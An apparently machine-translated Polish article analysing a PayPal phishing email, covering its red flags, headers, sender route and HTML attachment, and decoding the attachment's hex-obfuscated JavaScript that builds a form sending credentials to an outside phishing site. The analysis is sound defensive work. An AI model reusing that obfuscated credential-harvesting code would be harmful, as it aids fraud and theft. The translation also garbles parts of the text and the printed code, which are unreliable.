10Sep
W dzisiejszym świecie, w którym wszystkie informacje są dostępne online, phishing jest jednym z najpopularniejszych i najbardziej wyniszczających ataków online, ponieważ zawsze można wyczyścić wirusa, ale jeśli dane bankowe zostaną skradzione, masz kłopoty. Oto podział jednego z takich ataków, które otrzymaliśmy.
Nie sądzisz, że ważne są tylko twoje dane bankowe: w końcu, jeśli ktoś zyska kontrolę nad swoim loginem do konta, nie tylko zna informacje zawarte na tym koncie, ale szanse są takie same, że dane logowania mogą być używane na różnych kontach.inne konta. A jeśli naruszą twoje konto e-mail, mogą zresetować wszystkie inne hasła.
Oprócz utrzymywania silnych i zmiennych haseł, musisz zawsze zwracać uwagę na fałszywe e-maile, które są maskowane jako prawdziwe. Podczas gdy większość prób phishingu jest amatorska, niektóre są dość przekonujące, dlatego ważne jest, aby zrozumieć, jak rozpoznać je na poziomie powierzchni, a także jak działają pod maską.
Obrazek asirap
Badanie tego, co jest w zwykłym widoku
Nasz przykładowy e-mail, podobnie jak większość prób wyłudzania informacji, "powiadamia" Cię o aktywności na koncie PayPal, która w normalnych okolicznościach byłaby alarmująca. Tak więc wezwanie do działania polega na weryfikacji / przywróceniu konta poprzez przesłanie niemal każdej informacji osobistej, którą możesz wymyślić.Ponownie, jest to dość formuła.
Chociaż z pewnością istnieją wyjątki, praktycznie każda wiadomość e-mail dotycząca phishingu i oszustwa jest ładowana czerwonymi flagami bezpośrednio w samej wiadomości. Nawet jeśli tekst jest przekonujący, zwykle można znaleźć wiele błędów zaśmieconych w treści wiadomości, które wskazują, że wiadomość nie jest prawidłowa.
Message Body
Na pierwszy rzut oka jest to jeden z lepszych e-maili phishingowych, jakie widziałem. Nie ma błędów ortograficznych ani gramatycznych, a słownictwo czyta się zgodnie z oczekiwaniami. Jest jednak kilka czerwonych flag, które możesz zobaczyć, kiedy przyjrzysz się bliżej zawartości.
- "Paypal" - Prawidłowy przypadek to "PayPal"( duże P).Możesz zobaczyć obie odmiany używane w wiadomości. Firmy są bardzo świadome pod względem marki, więc wątpliwe jest, aby coś takiego przeszło proces weryfikacji.
- "zezwól na ActiveX" - Ile razy widziałeś legalną internetową firmę wielkości Paypal używającą zastrzeżonego komponentu, który działa tylko w jednej przeglądarce, szczególnie gdy obsługuje wiele przeglądarek? Pewnie, gdzieś tam jest jakaś firma, ale to jest czerwona flaga.
- "bezpiecznie." - Zauważ, jak to słowo nie jest wyrównane na marginesie z resztą tekstu akapitu. Nawet jeśli nieco rozciągnę okno, nie jest ono prawidłowo zawijane ani spacja.
- "Paypal!" - Przestrzeń przed wykrzyknikiem wygląda niezręcznie. Kolejne dziwactwo, które na pewno nie byłoby w prawdziwym e-mailu.
- "PayPal-Konto Update Form.pdf.htm" - Dlaczego Paypal miałby dołączyć "plik PDF", szczególnie, gdy mógłby po prostu link do strony na swojej stronie? Ponadto, dlaczego próbowali ukryć plik HTML jako plik PDF?To jest największa czerwona flaga z nich wszystkich.
Nagłówek wiadomości
Kiedy spojrzysz na nagłówek wiadomości, pojawi się kilka dodatkowych czerwonych flag:
- Adres z adresu to test@test.com.
- Brakuje adresu docelowego. Nie wyczyściłem tego, po prostu nie jest częścią standardowego nagłówka wiadomości. Zazwyczaj firma, która ma twoje imię, spersonalizuje e-mail.
Załącznik
Po otwarciu załącznika można od razu zobaczyć, że układ nie jest poprawny, ponieważ brakuje informacji o stylu. Ponownie, dlaczego firma PayPal wysyłałaby e-maile do formularza HTML, skoro mogliby po prostu podać link w swojej witrynie?
Uwaga: do używaliśmy wbudowanej przeglądarki załączników do Gmaila, ale zalecamy, aby NIE otwierać załączników od oszustów. Nigdy. Zawsze. Bardzo często zawierają exploity, które instalują trojany na komputerze w celu kradzieży informacji o koncie.
Przewijając nieco więcej, widzisz, że ten formularz wymaga nie tylko naszych danych logowania do systemu PayPal, ale także danych bankowych i kart kredytowych. Niektóre obrazy są zepsute.
Jest oczywiste, że ta próba phishingu idzie wszystko za jednym zamachem.
Podział techniczny
Chociaż powinno być całkiem jasne, na podstawie tego, co jest na widoku, że jest to próba phishingu, teraz zamierzamy przełamać techniczny skład wiadomości i zobaczyć, co możemy znaleźć.
Informacje z załącznika
Pierwszą rzeczą, na którą należy spojrzeć, jest źródło HTML formularza załącznika, który przekazuje dane do fałszywej witryny.
Podczas szybkiego przeglądania źródła, wszystkie linki wydają się poprawne, ponieważ wskazują na "paypal.com" lub "paypalobjects.com", które są zarówno uzasadnione.
Teraz rzucimy okiem na podstawowe informacje o stronie gromadzone przez Firefoksa na stronie.
Jak widać, niektóre grafiki są pobierane z domen "blessedtobe.com", "goodhealthpharmacy.com" i "pic-upload.de" zamiast legalnych domen PayPal.
Informacje z nagłówków wiadomości
Następnie przyjrzymy się nagłówkom wiadomości e-mail. Gmail udostępnia to za pomocą opcji menu Pokaż oryginał w wiadomości.
Patrząc na informacje w nagłówku oryginalnej wiadomości, możesz zobaczyć, że ta wiadomość została napisana przy użyciu programu Outlook Express 6. Wątpię, aby firma PayPal miała kogoś z personelu, który wysyła te wiadomości ręcznie przez przestarzałego klienta poczty e-mail.
Teraz patrząc na informacje o trasie, możemy zobaczyć adres IP zarówno nadawcy, jak i serwera poczty przychodzącej.
Adres IP użytkownika jest oryginalnym nadawcą.Wykonując szybkie wyszukiwanie informacji o IP, możemy zauważyć, że wysyłający adres IP znajduje się w Niemczech.
A kiedy patrzymy na serwer poczty przekazującej( mail.itak.at), adres IP widzimy, że jest to ISP z siedzibą w Austrii. Wątpię, aby system PayPal wysyłał wiadomości e-mail bezpośrednio przez dostawcę usług internetowych z Austrii, gdy mają one masową farmę serwerów, która mogłaby z łatwością obsłużyć to zadanie.
Dokąd zmierza dane?
Wyraźnie stwierdziliśmy, że jest to phishingowy e-mail i zgromadziliśmy informacje o tym, skąd pochodzi wiadomość, ale co z tym, gdzie wysyłane są twoje dane?
Aby to zobaczyć, musimy najpierw zapisać załącznik HTM do naszego pulpitu i otworzyć go w edytorze tekstu. Przewijanie, wszystko wydaje się być w porządku, chyba że dojdziemy do podejrzanie wyglądającego bloku JavaScript.
Wychodząc z pełnego źródła ostatniego bloku Javascript, widzimy:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var I, Y, X =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e” y =”; for( i = 0; I w którym x.length; I + = 2),{ y + = cofanie zmiany( "%" + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Za każdym razem, gdy widzisz duży, pomieszany ciąg pozornie przypadkowych liter i cyfr osadzonych w bloku JavaScript, zwykle jest to coś podejrzanego. Patrząc na kod, zmienna "x" jest ustawiona na ten duży ciąg, a następnie dekodowana do zmiennej "y".Końcowy wynik zmiennej "y" jest następnie zapisywany w dokumencie jako HTML.
Ponieważ przeważająca łańcucha składa się z liczb 0-9, a litery af, jest najprawdopodobniej kodowane za pomocą prostego ASCII do konwersji Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
przekłada się na:
i LT, nazwa postać =”głównym” id =”główne”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
To nie jest przypadek, że dekoduje się to w prawidłowy znacznik formularza HTML, który przesyła wyniki nie do PayPal, ale do fałszywej strony.
Dodatkowo, gdy wyświetlisz źródło HTML formularza, zobaczysz, że ten tag formularza nie jest widoczny, ponieważ jest generowany dynamicznie za pomocą Javascript. Jest to sprytny sposób na ukrycie tego, co faktycznie robi HTML, jeśli ktoś po prostu wyświetli wygenerowane źródło załącznika( tak jak to zrobiliśmy wcześniej) w przeciwieństwie do otwierania załącznika bezpośrednio w edytorze tekstów.
Po uruchomieniu szybkiego whois na obraźliwej stronie możemy zauważyć, że jest to domena hostowana na popularnym hoście internetowym, 1and1.
Wyróżnia się, że domena używa czytelnej nazwy( w przeciwieństwie do czegoś podobnego do "dfh3sjhskjhw.net"), a domena została zarejestrowana przez 4 lata. Z tego powodu uważam, że ta domena została porwana i wykorzystana jako pionek w tej próbie phishingu. Cynkizm
to dobra obrona
Jeśli chodzi o bezpieczeństwo w sieci, nigdy nie boli zbyt wiele cynizmu.
Chociaż jestem pewien, że w przykładowym e-mailu jest więcej czerwonych flag, to, co wskazaliśmy powyżej, to wskaźniki, które widzieliśmy po zaledwie kilku minutach badania. Hipotetycznie, jeśli poziom powierzchni wiadomości e-mail naśladował jej prawowitego odpowiednika w 100%, analiza techniczna nadal ujawniałaby jego prawdziwy charakter. To dlatego importuje możliwość sprawdzenia, co możesz i czego nie możesz zobaczyć.